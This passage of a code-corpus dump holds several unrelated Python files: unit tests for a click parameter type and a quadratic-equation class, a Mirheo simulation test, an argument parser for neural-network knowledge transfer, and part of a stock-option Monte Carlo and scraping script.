12),\n ('auto', (click.Choice(['auto', 'full']), click.INT, click.FLOAT), 'auto'),\n ('full', (click.Choice(['auto', 'full']), click.INT, click.FLOAT), 'full'),\n ('12', (click.Choice(['auto', 'full']), click.INT, click.FLOAT), 12),\n ('12.3', (click.Choice(['auto', 'full']), click.INT, click.FLOAT), 12.3),\n ],\n )\n def test_should_parse_expression_successfully(self, expression, param_types, value):\n union_type = FirstOf(*param_types)\n converted_value = union_type.convert(expression, None, None)\n assert type(value) == type(converted_value)\n assert value == converted_value\n\n @pytest.mark.parametrize(\n ('expression', 'param_types', 'expected_param_type'),\n [\n ('12', (click.INT,), click.INT),\n ('auto', (click.Choice(['auto', 'full']), click.INT), click.Choice(['auto', 'full'])),\n ('full', (click.Choice(['auto', 'full']), click.INT), click.Choice(['auto', 'full'])),\n ('12', (click.Choice(['auto', 'full']), click.INT), click.INT),\n ('12.3', (click.Choice(['auto', 'full']), click.INT, click.FLOAT), click.FLOAT),\n ],\n )\n def test_should_return_correct_param_type(self, expression, param_types, expected_param_type):\n union_type = FirstOf(*param_types, return_param=True)\n (param_type, _) = union_type.convert(expression, None, None)\n assert repr(expected_param_type) == repr(param_type)\n\n @pytest.mark.parametrize(\n ('expression', 'param_types'),\n [\n ('auto', (click.INT,)),\n ('12.6', (click.Choice(['auto', 'full']), click.INT)),\n ('bla', (click.Choice(['auto', 'full']), click.INT, click.FLOAT)),\n ],\n )\n def test_should_parse_expression_unsuccessfully(self, expression, param_types):\n union_type = FirstOf(*param_types)\n with pytest.raises(click.BadParameter, match=r'.*\\n - '.join(p.name.upper() for p in param_types)):\n union_type.convert(expression, None, None)\n","repo_name":"click-contrib/click_params","sub_path":"tests/test_miscellaneous.py","file_name":"test_miscellaneous.py","file_ext":"py","file_size_in_byte":9355,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"96"} +{"seq_id":"27196661179","text":"## START:\nimport unittest\nfrom Quadratic import QuadraticEquation\nfrom io import StringIO\nimport sys\n\n\ndef studentOutput(someFunc, *args, **kwargs):\n \"\"\"\n Captures the output from student's print statement.\n\n Args:\n someFunc (module): a given function\n *args: additional arguments needed for the function\n **kwargs: additional keyword arguments for the function\n\n Return:\n tuple: A tuple containing the returned value of the function and the printed output.\n \"\"\"\n\n # A new StringIO object is created. This is an in-memory file-like object.\n # It can be used as a string buffer which can capture the output.\n capturedOutput = StringIO()\n\n # The standard output is redirected to our `capturedOutput`.\n # This means anything that gets printed will now go to `capturedOutput` instead of the console.\n sys.stdout = capturedOutput\n\n # The function `someFunc` is called with any provided arguments and its output is stored.\n returnedOutput = someFunc(*args, **kwargs)\n\n # Standard output is reset to its default value, so future prints will go to the console.\n sys.stdout = sys.__stdout__\n\n # The content that was \"printed\" to `capturedOutput` is extracted and returned.\n printedOutput = capturedOutput.getvalue().strip()\n\n return (returnedOutput, printedOutput)\n\n\nclass TestQuadraticEquation(unittest.TestCase):\n \"\"\"\n Test suite for the QuadraticEquation class.\n \"\"\"\n\n def test_discriminant(self):\n \"\"\"\n Test the calculation of the discriminant.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, -3, 2)\n # Assert that the discriminant method returns the correct value\n self.assertEqual(equation.discriminant(), 1)\n\n def test_normal_roots(self):\n \"\"\"\n Test case for normal roots.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, -3, 2)\n # Assert that the roots method returns the correct roots\n self.assertEqual(equation.roots(), (2.0, 1.0))\n\n def test_identical_roots(self):\n \"\"\"\n Test case for identical roots.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, 2, 1)\n # Assert that the roots method returns a single root (since they are identical)\n self.assertEqual(equation.roots(), (-1.0))\n\n def test_no_real_roots(self):\n \"\"\"\n Test case for scenarios with no real roots.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, 0, 1)\n # Here we are testing an exception. We expect a ValueError to be raised.\n with self.assertRaises(ValueError) as context:\n equation.roots()\n # Further assert that the raised exception has the expected error message.\n self.assertEqual(str(context.exception), \"Discriminant is negative: No real roots.\")\n\n def test_linear_equation(self):\n \"\"\"\n Test case for when a = 0, which means the equation is linear.\n \"\"\"\n\n # We will use a linear equation: 0x^2 + 3x - 2 = 0 or 3x - 2 = 0 for this test.\n equation = QuadraticEquation(0, 3, -2)\n # The root for the linear equation 3x - 2 = 0 is x = 2/3.\n expectedRoot = (2 / 3)\n # Assert the expected and returned values.\n self.assertEqual(equation.roots(), expectedRoot)\n\n def test_linear_no_solution(self):\n \"\"\"\n Test case for when a = 0, b = 0, and c != 0, which means no solution for the linear equation.\n \"\"\"\n\n equation = QuadraticEquation(0, 0, 2)\n\n with self.assertRaises(ValueError) as context:\n equation.roots()\n\n self.assertEqual(str(context.exception), \"The equation has no solution.\")\n\n def test_linear_always_true(self):\n \"\"\"\n Test case for when a = 0, b = 0, and c = 0, which means the equation is always true for all x.\n \"\"\"\n\n equation = QuadraticEquation(0, 0, 0)\n\n with self.assertRaises(ValueError) as context:\n equation.roots()\n\n self.assertEqual(str(context.exception),\n \"The equation is always true for all x.\")\n\n def test_str_representation(self):\n \"\"\"\n Test the informal string representation of the QuadraticEquation.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, -3, 2)\n\n # We assert that the string representation of the equation object matches our expectation\n self.assertEqual(str(equation), \"x^2 - 3x + 2 = 0\")\n\n def test_str_print_output(self):\n \"\"\"\n Test the printed output of the informal string representation.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, -3, 2)\n expectedOutput = \"x^2 - 3x + 2 = 0\"\n\n # We utilize the studentOutput function to capture the print output\n printedOutput = studentOutput(print, equation)[1]\n\n # We assert that the captured print output matches our expectation\n self.assertEqual(printedOutput, expectedOutput)\n\n\n# This line ensures the unittests are executed when this script is run.\nif __name__ == \"__main__\":\n unittest.main()\n## END.","repo_name":"migh6544/COMP-3006","sub_path":"Assignments/5/Quadratic_UnitTest.py","file_name":"Quadratic_UnitTest.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42463013735","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport mirheo as mir\n\nranks = (1, 1, 1)\ndomain = [4., 6., 8.]\n\nu = mir.Mirheo(ranks, tuple(domain), debug_level=3, log_filename='log', no_splash=True)\n\npv = mir.ParticleVectors.ParticleVector('pv', mass = 1)\n\npos = [[a*domain[0], a*domain[1], a*domain[2]] for a in [0.1, 0.5, 0.8, 1.5]] # one particle is outside\nv=[1., 2., 3.]\nvel = [[a*v[0], a*v[1], a*v[2]] for a in [0.1, 0.5, 0.8, 1.5]]\n\nic = mir.InitialConditions.FromArray(pos, vel)\nu.registerParticleVector(pv, ic)\n\nu.run(2, dt=0)\n\nif pv:\n icpos = pv.getCoordinates()\n icvel = pv.getVelocities()\n np.savetxt(\"pos.ic.txt\", icpos)\n np.savetxt(\"vel.ic.txt\", icvel)\n \n\n# TEST: ic.fromArray\n# cd ic\n# rm -rf pos*.txt vel*.txt\n# mir.run --runargs \"-n 2\" ./from_array.py\n# paste pos.ic.txt vel.ic.txt | LC_ALL=en_US.utf8 sort > ic.out.txt\n","repo_name":"cselab/Mirheo","sub_path":"tests/ic/from_array.py","file_name":"from_array.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"96"} +{"seq_id":"7422707898","text":"from argparse import ArgumentParser\n\n# ----------------------------------- DEFAULT ARGUMENTS ------------------------------------------\nDATASET_CHOICES = 'cifar10', 'cifar100', 'svhn_cropped', 'fashion_mnist', 'mnist'\nMETHOD = ['distillation', 'pkt', 'pkt+distillation']\nMETHOD_CHOICES = 'distillation', 'pkt', 'pkt+distillation'\nSELECTIVE_LEARNING = False\nTEMPERATURE = 2\nKD_LAMBDA_SUPERVISED = 0.1\nPKT_LAMBDA_SUPERVISED = 1E-4\nK = 5\nKD_IMPORTANCE_WEIGHT = 1\nPKT_IMPORTANCE_WEIGHT = 1\nKEEP_BEST = True\nSAVE_STUDENTS = 'best'\nSAVE_STUDENTS_CHOICES = 'all', 'best', 'none'\nSAVE_RESULTS = True\nRESULTS_NAME_PREFIX = ''\nOUT_FOLDER_NAME = 'out'\nOPTIMIZER = 'adam'\nOPTIMIZER_CHOICES = 'adam', 'rmsprop', 'sgd', 'adagrad', 'adadelta', 'adamax'\nLEARNING_RATE = 1E-3\nLR_PATIENCE = 8\nLR_DECAY = 0.1\nLR_MIN = 1E-8\nEARLY_STOPPING_PATIENCE = 15\nBETA1 = .9\nBETA2 = .999\nRHO = .9\nMOMENTUM = .0\nDECAY = 1E-6\nTRAIN_BATCH_SIZE = 64\nEVAL_BATCH_SIZE = 128\nEPOCHS = 125\nVERBOSITY = 1\nDEBUG = False\nSEED = 0\n\n\n# ------------------------------------------------------------------------------------------------\n\n\ndef create_parser() -> ArgumentParser:\n \"\"\"\n Creates an argument parser for the KT script.\n\n :return: ArgumentParser object.\n \"\"\"\n parser = ArgumentParser(description='Transfer the knowledge between two Neural Networks, '\n 'using different methods and compare the results.')\n parser.add_argument('teacher', type=str, help='Path to a trained teacher network.')\n parser.add_argument('student', type=str, help='Path to a student network to be used.')\n parser.add_argument('dataset', type=str, choices=DATASET_CHOICES, help='The name of the dataset to be used.')\n parser.add_argument('-m', '--method', type=str.lower, nargs='+', default=METHOD, required=False,\n choices=METHOD_CHOICES, help='The KT method(s) to be used. (default %(default)s).')\n parser.add_argument('-sl', '--selective_learning', default=SELECTIVE_LEARNING, required=False, action='store_true',\n help='Whether the models should be designed for the KT with Selective Learning framework '\n '(default %(default)s).')\n parser.add_argument('-w', '--start_weights', type=str, required=False,\n help='Filepath containing existing weights to initialize the model.')\n parser.add_argument('-t', '--temperature', default=TEMPERATURE, required=False, type=float,\n help='The temperature for the distillation (default %(default)s).')\n parser.add_argument('-kdl', '--kd_lambda_supervised', default=KD_LAMBDA_SUPERVISED, required=False, type=float,\n help='The lambda value for the KD supervised term (default %(default)s).')\n parser.add_argument('-pktl', '--pkt_lambda_supervised', default=PKT_LAMBDA_SUPERVISED, required=False, type=float,\n help='The lambda value for the PKT supervised term (default %(default)s).')\n parser.add_argument('-k', '--neighbors', default=K, required=False, type=int,\n help='The number of neighbors for the PKT method evaluation (default %(default)s).')\n parser.add_argument('-kdw', '--kd_importance_weight', default=KD_IMPORTANCE_WEIGHT, required=False, type=float,\n help='The importance weight for the KD loss, if method is PKT plus KD (default %(default)s).')\n parser.add_argument('-pktw', '--pkt_importance_weight', default=PKT_IMPORTANCE_WEIGHT, required=False, type=float,\n help='The importance weight for the PKT loss, if method is PKT plus KD (default %(default)s).')\n parser.add_argument('-ufm', '--use_final_model', default=not KEEP_BEST, required=False, action='store_true',\n help='Whether the final model should be used for saving and results evaluation '\n 'and not the best one achieved through the training procedure (default %(default)s).')\n parser.add_argument('-s', '--save_students', type=str.lower, default=SAVE_STUDENTS, required=False,\n choices=SAVE_STUDENTS_CHOICES,\n help='The save mode for the final student networks. (default %(default)s).')\n parser.add_argument('-or', '--omit_results', default=not SAVE_RESULTS, required=False, action='store_true',\n help='Whether the KT comparison results should not be saved (default %(default)s).')\n parser.add_argument('-res', '--results_name_prefix', default=RESULTS_NAME_PREFIX, required=False, type=str,\n help='The prefix for the results filenames (default %(default)s).')\n parser.add_argument('-out', '--out_folder', default=OUT_FOLDER_NAME, required=False, type=str,\n help='Path to the folder where the outputs will be stored (default %(default)s).')\n parser.add_argument('-o', '--optimizer', type=str.lower, default=OPTIMIZER, required=False,\n choices=OPTIMIZER_CHOICES,\n help='The optimizer to be used. (default %(default)s).')\n parser.add_argument('-lr', '--learning_rate', type=float, default=LEARNING_RATE, required=False,\n help='The learning rate for the optimizer (default %(default)s).')\n parser.add_argument('-lrp', '--learning_rate_patience', type=int, default=LR_PATIENCE, required=False,\n help='The number of epochs to wait before decaying the learning rate (default %(default)s).')\n parser.add_argument('-lrd', '--learning_rate_decay', type=float, default=LR_DECAY, required=False,\n help='The learning rate decay factor. '\n 'If 0 is given, then the learning rate will remain the same during the training process. '\n '(default %(default)s).')\n parser.add_argument('-lrm', '--learning_rate_min', type=float, default=LR_MIN, required=False,\n help='The minimum learning rate which can be reached (default %(default)s).')\n parser.add_argument('-esp', '--early_stopping_patience', type=int, default=EARLY_STOPPING_PATIENCE, required=False,\n help='The number of epochs to wait before early stopping. '\n 'If 0 is given, early stopping will not be applied. (default %(default)s).')\n parser.add_argument('-cn', '--clip_norm', type=float, required=False,\n help='The clip norm for the optimizer (default %(default)s).')\n parser.add_argument('-cv', '--clip_value', type=float, required=False,\n help='The clip value for the optimizer (default %(default)s).')\n parser.add_argument('-b1', '--beta1', type=float, default=BETA1, required=False,\n help='The beta 1 for the optimizer (default %(default)s).')\n parser.add_argument('-b2', '--beta2', type=float, default=BETA2, required=False,\n help='The beta 2 for the optimizer (default %(default)s).')\n parser.add_argument('-rho', type=float, default=RHO, required=False,\n help='The rho for the optimizer (default %(default)s).')\n parser.add_argument('-mm', '--momentum', type=float, default=MOMENTUM, required=False,\n help='The momentum for the optimizer (default %(default)s).')\n parser.add_argument('-d', '--decay', type=float, default=DECAY, required=False,\n help='The decay for the optimizer (default %(default)s).')\n parser.add_argument('-bs', '--batch_size', type=int, default=TRAIN_BATCH_SIZE, required=False,\n help='The batch size for the optimization (default %(default)s).')\n parser.add_argument('-ebs', '--evaluation_batch_size', type=int, default=EVAL_BATCH_SIZE, required=False,\n help='The batch size for the evaluation (default %(default)s).')\n parser.add_argument('-e', '--epochs', type=int, default=EPOCHS, required=False,\n help='The number of epochs to train the network (default %(default)s).')\n parser.add_argument('-v', '--verbosity', type=int, default=VERBOSITY, required=False,\n help='The verbosity for the optimization procedure (default %(default)s).')\n parser.add_argument('--debug', default=DEBUG, required=False, action='store_true',\n help='Whether debug mode should be enabled (default %(default)s).')\n parser.add_argument('-seed', '--seed', type=int, default=SEED, required=False,\n help='The seed for all the random operations. Pass a negative number, '\n 'in order to have non-deterministic behavior (default %(default)s).')\n return parser\n\n# TODO use Hydra (https://hydra.cc/) instead.\n","repo_name":"Adamantios/Knowledge-Transfer","sub_path":"utils/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":8832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"29163129234","text":"import urllib, time, os, re, csv\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas_datareader.data as web\nimport datetime as dt\nimport json as js\nimport math\nimport random as rand\nfrom bs4 import BeautifulSoup\nimport pickle\nimport requests\nfrom matplotlib import style\nfrom collections import Counter\n#from sklearn import svm, cross_validation, neighbors\n#from sklearn.ensemble import VotingClassifier, RandomForestClassifier\n\nfrom googlefinance import getQuotes\nfrom yahoo_finance import Share\n\n#******************************************************************************\n#*************************** Functions ****************************************\n#******************************************************************************\n\ndef fetchGF(googleticker):\n \"\"\"\n\n :param googleticker:\n :return:\n \"\"\"\n result = []\n returnedResult = False;\n tryCount = 0\n while not returnedResult:\n try:\n result = getQuotes(\"GE\")\n returnedResult = True\n except:\n time.sleep(60)\n tryCount += 1\n\n return result\n\ndef yhGetHistory(myTicker, start, stop):\n \"\"\"\n Helper function used by getMeData function\n\n myTicker: string ticker symbol\n start: string, format = \"YYYY-M-D\"\n stop: string, format = \"YYYY-M-D\"\n return: list of dictionaries\n \"\"\"\n histList = []\n\n myStock = Share(myTicker)\n myRecord = myStock.get_historical(start, stop)\n\n for i in range(len(myRecord)):\n tempDate = myRecord[i][\"Date\"]\n tempOpen = float(myRecord[i][\"Open\"])\n tempHigh = float(myRecord[i][\"High\"])\n tempLow = float(myRecord[i][\"Low\"])\n tempClose = float(myRecord[i][\"Close\"])\n tempVolume = int(myRecord[i][\"Volume\"])\n tempAdjClose = float(myRecord[i][\"Adj_Close\"])\n\n histList.append({\"Date\" : tempDate, \"Open\" : round(tempOpen, 2), \"High\" : round(tempHigh, 2), \"Low\" : round(tempLow, 2),\n \"Close\" : round(tempClose, 2), \"Volume\" : tempVolume, \"Adj Close\" : round(tempAdjClose, 2)})\n\n return histList\n\ndef getMeData(ticker, start, stop):\n \"\"\"\n Builds a data frame out of data returned by yhGetHistory\n ticker: string stock ticker\n start: string, format = \"YYYY-M-D\"\n stop: string, format = \"YYYY-M-D\"\n return df: data frame with Date, Open, Close, Volume\n \"\"\"\n\n colOrder = [\"Date\", \"Open\", \"High\", \"Low\", \"Close\", \"Volume\", \"Adj Close\"]\n\n myData = yhGetHistory(ticker, start, stop)\n myDF = pd.DataFrame(myData)\n myDF = myDF[colOrder]\n myDF.set_index([\"Date\"], inplace = True)\n myDF.sort_index(ascending = True, inplace = True)\n\n return myDF\n\ndef altGetMeData(ticker, start, stop):\n \"\"\"\n Works very sporadically\n :param ticker:\n :param start:\n :param stop:\n :return:\n \"\"\"\n df = web.DataReader(ticker, 'yahoo', start, stop)\n return df\n\ndef getMeStats(df):\n \"\"\"\n Calculates the daily price change of the underlyings price data and then calculates the mean, median and\n standard deviation of the daily price change.\n df: dataframe of stock data\n return: mean, median, standard deviation (tuple) of change and dataframe with new columns (Change, 20D_MA, 50D_MA,\n and 100D_MA)\n \"\"\"\n temp = df[\"Close\"]\n temp = temp.diff()\n df[\"Change\"] = temp\n df[\"20D_MA\"] = df[\"Close\"].rolling(window = 20, min_periods = 0).mean()\n df[\"50D_MA\"] = df[\"Close\"].rolling(window = 50, min_periods = 0).mean()\n df[\"100D_MA\"] = df[\"Close\"].rolling(window = 100, min_periods = 0).mean()\n df.drop(df.index[0], inplace = True)\n mu = round(np.mean(df[\"Change\"]), 3)\n med = round(np.median(df[\"Change\"]), 3)\n s = round(np.std(df[\"Change\"]), 3)\n\n return (mu, med, s), df\n\ndef runExcerciseTrial(myClass, myStats, priceAtEntry, numDays, numTrials):\n trialData = []\n for i in range(numTrials):\n samples = np.random.normal(myStats[0], myStats[2], numDays)\n sumSamples = round(np.sum(samples), 2)\n finalPrice = priceAtEntry + sumSamples\n trialData.append(myClass.inMoney(finalPrice))\n\n return round((np.sum(trialData)/numTrials), 3)\n\ndef runPriceTrial(myStats, priceAtPurchase, numDays, numTrials, optionLegs):\n \"\"\"\n Simulates a single/multi leg option trade. Samples from a normal distribution with the mean and std of the\n change data of the underlying are picked. The number of samples are given by numDays. The samples are summed and added\n to the price of the underlying when the trade was entered. The resulting price is the underlyings price at the end of the trade.\n The end price is passed to the findPL method of each leg, the results are added to find the value of the overall trade.\n\n myStats: mean, median, and standard deviation of \"Change\" of the underlying\n priceAtPurchase: underlying's price at entry into the trade\n numDays: number of days in the trade\n numTrials: number of times to run the trial\n optionLegs: a list of instantions of option objects\n return: list of option chain P/L at the end of the number of days in the trial(i.e. sums of P/Ls of each leg)\n \"\"\"\n trialData = []\n for i in range(numTrials): #iterate over the number of trials\n samples = np.random.normal(myStats[0], myStats[2], numDays)\n sumSamples = round(np.sum(samples), 2)\n finalPrice = priceAtPurchase + sumSamples\n\n temp = 0\n for j in range(len(optionLegs)): #iterate over option legs\n temp += round(optionLegs[j].findPL(finalPrice), 2)\n\n trialData.append(temp)\n\n return trialData\n\n# def plotOption(start, stop, myClass, myClass1 = None, myClass2 = None, myClass3 = None):\n# \"\"\"\n# Calculate the value of an option or multi-leg option versus the price of the underlying\n#\n# start: price of underlying to start analysis at\n# stop: price of underlying to stop analysis at\n# myClass: object of type of callOption or putOption\n# myClass1: optional 2nd leg\n# myClass2: optional 3rd leg\n# myClass3: optional 4th leg\n# return: two lists; first is price of underlying, second is value of option\n# \"\"\"\n# xData = []\n# yData = []\n# for i in range(start, stop):\n# xData.append(i)\n# if (myClass1 is None) and (myClass2 is None) and (myClass3 is None):\n# yData.append(myClass.findPL(i))\n# elif (myClass2 is None) and (myClass3 is None):\n# yData.append(myClass.findPL(i) + myClass1.findPL(i))\n# elif (myClass3 is None):\n# yData.append(myClass.findPL(i) + myClass1.findPL(i) + myClass2.findPL(i))\n# else:\n# yData.append(myClass.findPL(i) + myClass1.findPL(i) + myClass2.findPL(i) + myClass3.findPL(i))\n#\n# # plt.plot(xData, yData)\n# # plt.show()\n# return xData, yData\n\ndef plotOption(start, stop, optionLegs):\n \"\"\"\n Calculate the value of an option or multi-leg option chain over a range of the underlying's price\n\n start: price of underlying to start analysis at\n stop: price of underlying to stop analysis at\n optionLegs: a list of instantions of option objects\n return: two lists; first is price of underlying, second is value of option\n \"\"\"\n xData = []\n yData = []\n for i in np.arange(start, stop, (stop - start)/100): #iterate over price\n xData.append(i)\n temp = 0\n for j in range(len(optionLegs)): #iterate over option legs\n temp += optionLegs[j].findPL(i)\n\n yData.append(temp)\n\n return xData, yData\n\ndef buildSimulateChain():\n \"\"\"\n The user enters data to build an option chain which is then simulated. First each leg of the chain is simulated to\n look at the probability that it will close above the strike price for a range of the underlying's price centered\n about its price when the trade was entered. Second the trade is simulated to show the probability of final yields\n at expiration.\n\n return: null, results appear as graphs\n \"\"\"\n\n yes = [\"YES\", \"Yes\", \"yes\", \"Y\", \"y\"]\n no = [\"NO\", \"No\", \"no\", \"N\", \"n\"]\n call = [\"Call\", \"call\", \"CALL\", \"c\", \"C\"]\n put = [\"Put\", \"put\", \"PUT\", \"p\", \"P\"]\n ticker = \"\"\n\n decision = input(\"Do you want to analyze an option chain? \")\n if decision in yes:\n # enter basic data\n with open(\"sp500tickers.pickle\", \"rb\") as f:\n tickers = pickle.load(f)\n while ticker == \"\":\n ticker = (input(\"Please tell me the TICKER of underlying \")).upper()\n if ticker not in tickers:\n print(\"Sorry that doesn't seem to be a valid ticker symbol\\n\")\n ticker = \"\"\n\n priceAtEntry = float(input(\"Please tell me its current price? \"))\n\n decision = input(\"Do you want to load new historical price data? \")\n if decision in yes:\n myDF = getMeData(ticker, \"2016-1-2\", \"2017-3-27\")\n myDF.to_csv(ticker + \"csv\")\n myStats, _ = getMeStats(myDF)\n else:\n myDF = pd.read_csv(ticker + \".csv\", parse_dates=True, index_col=0)\n myStats, _ = getMeStats(myDF)\n\n numDays = int(input(\"How many DAYS are left until expiration? \"))\n numTrials = int(input(\"How many TRIALS do you want to do for each data point? \"))\n\n # enter option leg data\n enterAnother = \"y\"\n legs = list()\n while (enterAnother in yes):\n optionType = input(\"What TYPE of option do you want, Put or Call? \")\n buySell = input(\"Are you BUYING the options? \")\n if buySell in yes:\n buyOption = True\n else:\n buyOption = False\n optionQty = float(input(\"HOW MANY options do you want? \"))\n strikePrice = round(float(input(\"What is the STRIKE price of the option? \")), 2)\n purchasePrice = round(float(input(\"What is the PURCHASE price of the option? \")), 2)\n fee = float(input(\"What is the FEE to buy or sell? \"))\n\n if optionType in call:\n legs.append(callOption(purchasePrice, fee, strikePrice, optionQty, buyOption))\n else:\n legs.append(putOption(purchasePrice, fee, strikePrice, optionQty, buyOption))\n\n enterAnother = input(\"Do you want to add another leg to the option chain? \")\n\n\n # Plot the probability of each legs price being above(below) the strike price after numDays versus underlying's price\n # at entering the trade. At each underlying price numTrials simulations are done.\n xData = np.arange((priceAtEntry - 2), (priceAtEntry + 2), ((priceAtEntry - 2) + (priceAtEntry + 2)) / 100)\n for j in range(len(legs)):\n yData = []\n for i in xData:\n yData.append(runExcerciseTrial(legs[j], myStats, i, numDays, numTrials))\n\n fig1, (ax1) = plt.subplots(1, 1)\n ax1.set_title(\"{} Option Leg {} Pct Chance of Being Excercised\".format(ticker, (j + 1)))\n ax1.set_xlabel(\"Underlying Price at Entry\")\n ax1.set_ylabel(\"Probability of Being Excercised\")\n ax1.text((priceAtEntry - 2), 0.6, \"Number of Trials {}\".format(numTrials))\n ax1.text((priceAtEntry - 2), 0.55, \"There were {} days until expiration\".format(numDays))\n ax1.text((priceAtEntry - 2), 0.5, \"Strike Price is {}\".format(legs[j].strike))\n ax1.plot(xData, yData)\n plt.show()\n\n # Plot the yield curve for the option chain and a histogram of distribution of yields for numTtrial simulations\n someX, someY = plotOption(0.75 * priceAtEntry, 1.25 * priceAtEntry, legs)\n yields = runPriceTrial(myStats, priceAtEntry, numDays, numTrials, legs)\n num_bins = 20\n\n c = Counter(yields)\n mostCommon = c.most_common(3)\n top = mostCommon[0][1] # want to find top left corner to position text in fig2\n left = np.min(yields) #\n first = mostCommon[0][0]\n firstPercent = round(((mostCommon[0][1] / numTrials) * 100), 2)\n second = mostCommon[1][0]\n secondPercent = round(((mostCommon[1][1] / numTrials) * 100), 2)\n third = mostCommon[2][0]\n thirdPercent = round(((mostCommon[2][1] / numTrials) * 100), 2)\n\n fig2, (ax1, ax2) = plt.subplots(2, 1)\n ax1.set_title(\"{} Option Chain Yield\".format(ticker))\n ax1.set_xlabel(\"Underlying Price\")\n ax1.set_ylabel(\"Yield\")\n ax1.plot(someX, someY)\n ax2.set_title(\"{} Option Chain Yield Histogram\".format(ticker))\n ax2.set_xlabel(\"Yield\")\n ax2.set_ylabel(\"Trials at Yield\")\n ax2.text(left, 0.95 * top, \"Number of Trials {}\".format(numTrials))\n ax2.text(left, 0.825 * top, \"There were {} days until expiration\".format(numDays))\n ax2.text(left, 0.70 * top, \"Most common is {} at {}%\".format(first, firstPercent))\n ax2.text(left, 0.575 * top, \"2nd most common is {} at {}%\".format(second, secondPercent))\n ax2.text(left, 0.45 * top, \"3rd most common is {} at {}%\".format(third, thirdPercent))\n ax2.hist(yields, num_bins)\n\n fig2.tight_layout(h_pad=0.5)\n plt.show()\n\ndef getOptionData(where = \"J:\\computationalFinance\\Option Chain1.html\", when = \"Apr 7 2017\"):\n \"\"\"\n Scrapes HTML from Ameritrade using BueautifulSoup. Pulls out option tables for calls and\n puts for a given date\n\n where: location of data\n when: date of options\n return: data frame with call data, data frame with put data\n \"\"\"\n try:\n page = open(where)\n soup = BeautifulSoup(page.read())\n except:\n print(\"Try Again, bad URL\")\n return (), ()\n\n try:\n tableRow = soup.find(id = (\"header\" + when)) #find table row with id containing header and our date\n except:\n print(\"Try again, bad date\")\n return (), ()\n\n tableBody = tableRow.find_parent() #we want the tably body\n\n optionTitleRow = tableBody.select(\".optionTypeTitle\") #table is split into call/puts each has a CSS class optionTypeTitle\n row0is = optionTitleRow[0].get_text()\n\n if (row0is.strip() == 'Calls'):\n calls = optionTitleRow[0].find_parent().find_parent() #go up two levels to find table body\n puts = optionTitleRow[1].find_parent().find_parent()\n else:\n calls = optionTitleRow[1].find_parent().find_parent()\n puts = optionTitleRow[0].find_parent().find_parent()\n\n callRows = calls.find_all(\"tr\")\n putRows = puts.find_all(\"tr\")\n callQuotes = [] #list of tupples each of which contains option quote data\n putQuotes = []\n\n #build callQuotes list of tupples\n for i in range(1, len(callRows)): #first row is just header info\n temp = callRows[i].find_all(\"td\")\n temp2 = ()\n for j in range(len(temp)):\n quotePiece = temp[j].get_text().strip() #get piece of individual quote\n if quotePiece != \"\":\n temp2 = temp2 + (quotePiece,) #add piece to the tupple\n else:\n continue\n callQuotes.append(temp2)\n\n #build putQuotes list of tupples\n for i in range(1, len(putRows)):\n temp = putRows[i].find_all(\"td\")\n temp2 = ()\n for j in range(len(temp)):\n quotePiece = temp[j].get_text().strip()\n if quotePiece != \"\":\n temp2 = temp2 + (quotePiece,)\n else:\n continue\n putQuotes.append(temp2)\n\n tableColumns = [\"Strike\", \"Bid\", \"Ask\", \"Last\", \"Change\", \"Vol\", \"Open Int\"]\n calls = pd.DataFrame(index = np.arange(len(callQuotes)), columns = tableColumns)\n puts = pd.DataFrame(index = np.arange(len(callQuotes)), columns = tableColumns)\n\n for i in range(len(callQuotes)):\n tempRow = []\n for j in range(len(tableColumns)):\n dataItem = callQuotes[i][j].split()[0]\n dataItem = dataItem.replace(',', '')\n dataItem = dataItem.replace('--', '0')\n tempRow.append(round(float(dataItem), 2))\n calls.iloc[i] = tempRow\n\n for i in range(len(putQuotes)):\n tempRow = []\n for j in range(len(tableColumns)):\n dataItem = callQuotes[i][j].split()[0]\n dataItem = dataItem.replace(',', '')\n dataItem = dataItem.replace('--', '0')\n tempRow.append(round(float(dataItem), 2))\n puts.iloc[i] = tempRow\n\n return calls, puts\n\ndef save_sp500tickers():\n \"\"\"\n Read SP500 stock symbols from Wikipedia and write them in a pickle\n dependency: lxml parser be installed\n return: list of SP500 stock symbols\n \"\"\"\n tickers = []\n\n #changed from http to https\n resp = requests.get('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\n soup = BeautifulSoup(resp.text, 'lxml')\n table = soup.find('table', {'class': 'wikitable sortable'})\n\n for row in table.findAll('tr')[1:]:\n ticker = row.findAll('td')[0].text\n tickers.append(ticker)\n\n with open(\"sp500tickers.pickle\", \"wb\") as f:\n pickle.dump(tickers, f)\n\n return tickers\n\ndef get_data_from_yahoo(start, stop, reload_sp500=False):\n \"\"\"\n\n start: string, format = \"YYYY-M-D\"\n stop: string, format = \"YYYY-M-D\"\n reload_sp500: when true SP500 Tickers will be regenerated\n return: null\n \"\"\"\n if reload_sp500:\n tickers = save_sp500tickers()\n else:\n with open(\"sp500tickers.pickle\",\"rb\") as f:\n tickers = pickle.load(f)\n\n if not os.path.exists('stock_dfs'):\n os.makedirs('stock_dfs')\n\n for ticker in tickers[:5]: #just do five for now\n if not os.path.exists('stock_dfs/{}.csv'.format(ticker)):\n df = getMeData(ticker, start, stop)\n df.to_csv('stock_dfs/{}.csv'.format(ticker))\n time.sleep(0.5) #don't piss yahoo off\n else:\n print('Already have {}'.format(ticker))\n\n return\n\ndef compile_data():\n \"\"\"\n Reads the data frames of individual tickers, throws out all comlumns other than adjusted close, and\n then joins into one big data frame\n 